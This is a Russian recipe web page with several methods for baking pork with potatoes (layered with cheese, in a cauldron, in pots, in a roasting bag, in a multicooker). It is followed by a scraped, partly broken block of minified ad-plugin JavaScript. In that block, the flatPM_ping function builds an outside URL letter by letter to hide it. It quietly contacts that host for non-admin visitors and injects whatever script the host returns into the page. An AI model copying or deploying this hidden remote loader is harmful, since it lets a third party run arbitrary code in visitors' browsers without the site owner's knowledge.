  2. Параллельно обжарьте на сковородке лук с морковкой.
  3. Соедините компоненты в казане или иной жарочной посуде, залейте водой, посолите. Если найдется бульон – добавляйте его.
  4. Поместите ёмкость в духовку, разогрев её до 200 о С. Настройтесь на ожидание в течение часа. Коренья и другие приправы кладите незадолго до окончания тушения. Тогда же попробуйте жаркое на вкус, отрегулируйте количество соли, добавьте перец. Если любите лавровый лист, положите, но не забудьте его вытащить сразу после приготовления.

Как запечь мясо с картошкой, грибами и сыром

Вариант напоминает классическое мясо по-французски, шикарно смотрится на праздничном столе. Можно запекать слоями, общим блюдом или сделать порционно. Рецепт подойдет для приготовления в духовке корейки — лучшей части поросенка.

  • Свинина: — 600 гр.
  • Грибы (шампиньоны) – 500 гр.
  • Картофель – 600-700 гр.
  • Большая луковица.
  • Твёрдый сыр – 300 гр.
  • Красное вино – 100 мл.
  • Майонез – 3 ложки.
  • Подсолнечное масло – 3 ложки.
  • Розмарин, карри, шалфей, острый красный перец, паприка, черный перец.
  1. Ополосните кусок свинины, обсушите салфетками. Поделите на порции, нарезав поперек волокон. Толщина полуфабриката около 2 см.
  2. Отбейте молоточком, сбрызните вином, сдобрите приправами, предложенными в рецептурном списке.
  3. Затяните посуду пищевой пленкой, оставьте мариноваться на четверть часа.
  4. Нашинкуйте луковку, бросьте на сковородку пассероваться. Следом, когда нарезка станет прозрачной, выложите порубленные пластинами шампиньоны. Жарьте продукты до красивого цвета (сок из шампиньонов должен непременно выпариться). Вместо шампиньонов, если сезон, допустимо взять любые лесные грибочки.
  5. Включите духовку прогреваться до 200 о С. А пока потрите крупной стружкой сыр. почистите картофель. Нашинкуйте клубни не слишком толстыми кружками.
  6. Первым слоем делайте картофель. Далее укладывается мясо, затем грибная начинка.
  7. Пролейте блюдо майонезом, посыпьте ровным слоем сыр. Если решите готовить порционное блюдо, картошка со свининой меняются местами, вниз кладется отбитое мясо. Тогда располагайте заготовки на расстоянии.
  8. Поставьте противень на средний уровень духовки. Включите таймер на 35-40 минут.

Видео-рецепт вкусной свинины, запеченной в фольге

По ингредиентам блюда очень похожи, разница в дополнительных приправах и продуктах. Отличается и технология приготовления. В данном случае автор предлагает запекать в фольге. Попробуйте, если еще не применяли этот способ, руководствуясь её пошаговым рассказом. Приятного аппетита!

Свинина с картошкой в духовке — простые и вкусные рецепты

Всем доброго времен суток!

Как же здорово, когда в доме у хозяюшки хорошее настроение, тогда вся работа спорится, еда вкусная получается и все во круг довольны. Так давай те же за любые дела браться с улыбкой и радостью, близкие непременно заметят это, потому что даже самое простое блюдо будет казаться шедевром!

В нашей семье любят блюда из свиного мяса. Может потому, что мы выращиваем этих животных, и кушаем домашнее мясцо, сало, не заглядываем на рынки и супермаркет.

Яства из поросенка всегда сытные, сочные и очень вкусные и рецептов приготовления существует великое множество. Можно конечно готовить по проверенным техникам, но каждая волшебница на кухне старается приготовить что-то новое и аппетитное, внести изменения в обычное приевшееся меню.

Я готовлю свинину в сочетании с картошкой, очень сытный обед или ужин получается. В последнее время все чаще делаю блюда в духовке по той простой причине, что у нас в семье маленький ребенок. И жареная пища еще сложна для детского пищеварения, поэтому и мясо берем не жирное, без прожилок жира.

Свинина с картошкой — простой рецепт в духовке

Простой и аппетитный рецепт не оставит равнодушным любителей картошки по- французски. Слоями запеченное мясо с картофелем под соусом с сырной корочкой с удовольствием уплетает мое семейство.

Готовится легко, получается сочно, данные продукты практически всегда есть в каждой семье, даже если нет, то их цена демократична.

Ингредиенты:

  • Свинина — 400 г
  • Картофель — 1 кг
  • Яйца — 2 шт.
  • Сыр — 150 г
  • Чеснок свежий и сушеный — по вкусу
  • Соль — по вкусу
  • Сметана — 150 г

Способ приготовления:

Берем филе свинины, кладем на разделочную доску и нарезаем вначале на крупные тонкие пласты, затем на средние, примерно одинаковые, кусочки.

Кусочки мяса посыпаем солью и сушеным чесноком, перемешиваем и оставляем мариноваться.

Картофель моем под краном, овощечисткой срезаем кожуру и при помощи ножа превращаем её в соломку.

В миску разбиваем яйца, взбиваем и выкладываем в них сметану. Солим по вкусу, выдавливаем через пресс в соус чеснок по вашему желанию 4-6 дольки, тщательно перемешиваем.

Ну вот три основные этапа прошли, осталось дело за малым, выложить все в форму и запечь. В противень стелим пергаментную бумагу, если таковой нет возьмите фольгу, либо просто смажьте маслом лист.

Следующий шаг! Выкладываем ломтики свинины и поливаем ее частью соуса.

Сверху кладем плотным слоем картофель и заливаем остатками сметанной смеси.

Накрываем фольгой форму и ставим в духовой шкаф на 40 минут.

Важно! Температура в духовке должна быть в районе 200 — 220 градусов. Приготовим наше кушанье с корочкой, для этого на крупной терке натрем сыр.

После того как печь просигнализирует о готовности блюда, достанем наш лист и посыпем сверху хорошенько сыром, а затем поставим в духовку еще на 3-5 минут, чтобы образовалась румяная корочка.

Подавать можно с овощами или кушать просто с хлебушком, очень вкусно. Приятного аппетита!

Рецепт мяса по-французски из свинины в духовке с картошкой

Друзья, я решила не раздумываю показать вам сюжет, который меня подверг на очередной подвиг. Приготовив по этому рецепту, вы просто пальчики облизывать будете. Получается безумно вкусно, рекомендую к просмотру этот сюжет, однозначно. Тем более показывает и рассказывает мастер своего дела, шеф-повар.

Картофель с мясом в казане в духовке

Казан — такая хорошая вещь, как я раньше без него жила. Приготовленная в нем пища получатся великолепной, огромный плюс в том еще, что ничего не пригорает. Использовать его можно на плите, в духовом шкафу, печи, на открытом огне. Подготавливаем продукты, все складываем в чудесный чан и отправляем в духовку.

Ингредиенты:

  • Свинина — 350 г
  • Картофель — 1,3 кг
  • Лук — 3-4 шт.
  • Грибы вешенки — 200 г
  • Морковь — 1 шт.
  • Чеснок — 2-3 зубчика
  • Соль — по вкусу
  • Приправы — по вкусу
  • Растительное масло — 50 г

Способ приготовления:

Кусочки свининки выкладываем в казан, посыпаем солью и приправами по вкусу, перемешиваем и добавляем масло.

Очищенную картошку нарезаем средними кубиками, высыпаем поверх мяса. Грибы моем, режем, выкладываем на картофель. Далее шинкуем на крупной терке морковь, репчатый лук и чеснок мелко рубим.

Все кладем в казан присыпая специями и поливаем маслом. Тщательно перемешиваем.

Ставим в духовку разогретую до 250 градусов.

Через час достаем и приглашаем к столу домочадцев. Приятных открытий!

Готовим свинину в горшочке с картофелем

Впервые данное блюдо я попробовала в гостях у тети, и с тех далеких пор с удовольствием готовлю дома. Большое разнообразие горшочков на цвет и цену представлено в магазинах.

Приготовленную в них еду приятно употреблять, она остается теплой долго, а аромат и вкус божественен. Побалуйте близких таким угощением!

Ингредиенты:

  • Свинина — 500 г
  • Картофель — 500 г
  • Лук репчатый — 1 шт.
  • Масло сливочное — 40 г
  • Морковь — 1 шт.
  • Сыр — 100 г
  • Молоко — 150 мл
  • Кетчуп — 3 ст.л
  • Соль — по вкусу
  • Перец черный молотый — по вкусу

Способ приготовления:

Закладываем в горшочки порезанную на мелкие кусочки мякоть свинины.

Следующий кандидат в горшок — кубики картофеля и сверху сливочное масло.

Репчатый лук нарезанный мелкими брусочками кладем следующим слоем.

Морковку крошим на крупной терке и помещаем четвертым слоем.

Готовим соус. Для этого в глубокую миску вливаем молоко, кетчуп, солим и перчим по вкусу, заливаем поверх моркови.

Закрываем крышечкой и отправляем в духовку. Температуру выставляем на 200 градусов и в течение 1 часа 10 минут готовим.

Затем достаем, посыпаем тертым сыром и ставим томиться еще на 15 минут.

По истечению времени подаем гостям отведать вкуснятину! Приятных впечатлений!

Картошка запеченная со свининой в рукаве

В рукаве приготовленная картошечка с мясом не оставит равнодушным любителей вкусно поесть. К вам через час придут гости? Не знаете чем накормить? Тогда этот рецепт вам в помощь! Дерзайте! Все очень просто и очень вкусно, а главное сытно!

Ингредиенты:

  • Свинина — 600 г
  • Картофель — 5-6 шт.
  • Морковь -1 шт.
  • Лук — 2 шт.
  • Масло растительное — 50 мл
  • Соль — по вкусу
  • Приправы — по вкусу

Способ приготовления:

Нарезанную небольшими ломтиками свинину заправляем приправами, солью и растительным маслом. В этом виде пусть постоит 15 минут.

С моркови, картофеля и лука снимаем кожуру. Шинкуем овощи соломкой. Солим, перчим и перемешиваем с маслом растительным.

Берем рукав для запекания и выкладываем в него первым делом овощи, затем сверху мясо, распределяя слои равномерно по всей площади пакета.

Закрепляем края рукава, и ножом делаем проколы на поверхности заготовки, чтобы он не лопнул от высокой температуры.

Кладем рукав на противень и ставим в разогретую духовку на 200 градусов и выпекаем в течение часа. Удачных открытий!

Мясо под шубой в духовке По-королевски с картофелем и сыром

Ну, а как на счет другого блюда, которое едят только короли))). Ну и мы с вами. Хотите научиться также готовить? Тогда нажимайте кнопку и смотрите сюжет, и вы точно станете лучшим поваром. Даже неопытный кулинар освоит эту простую рецептуру.

Вкусная свинина с картофелем в мультиварке (бонусный рецепт)

Очень вкусная, не жирная свинина с картошкой с овощами в мультиварке — это несравненное блюдо, вы как считаете? У кого есть такая помощница приготовьте обязательно это яство в ней.

В любое время года это блюдо актуально. Со свежими овощами с лета по осень, а в зиму использую свежезамороженные заготовки, если таковых нет, то супермаркет вам в помощь, там круглый год свежие овощи продаются.

Ингредиенты:

  • Свинина — 600 г
  • Картофель — 1,3 кг
  • Лук — 130 г
  • Морковь — 150 г
  • Перец болгарский — 180 г
  • Имбирь — 5 г
  • Вода — 300 мл
  • Соль — по вкусу
  • Приправы — по вкусу

Способ приготовления:

Мясо свинины рубим средними кусками на доске.

Очищенный от шелухи лук нарезаем мелко.

Чтобы не плакали ваши прекрасные глазки от горечи овоща, смачивайте периодически нож в холодной воде.

Сладкий перец промываем, удаляем плодоножку и семена, с помощью нехитрых действий превращаем в кубики. Картофель — наш второй хлеб, чистим и крупными ломтиками режем.

Имбирь натираем на мелкой терке. Оранжевый овощ чистим с помощью овощечистки и трем на крупной стороне терки. В мультиварку выкладываем все овощи, кроме картошки. Мясо солим и посыпаем приправами по вкусу.

Перемешиваем содержимое и сверху кладем картофель. Возьмем чайную ложечку соли и приправим картошку, затем вливаем воду и закрываем крышкой.

В мультиварке редмонд готовим на режиме тушения в течении часа.

Перемешиваем и подаем к столу. Приятного аппетита!

На этом друзья, все. Подписывайтесь ко мне в группу в контакте, всем удачи и до свидания.

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};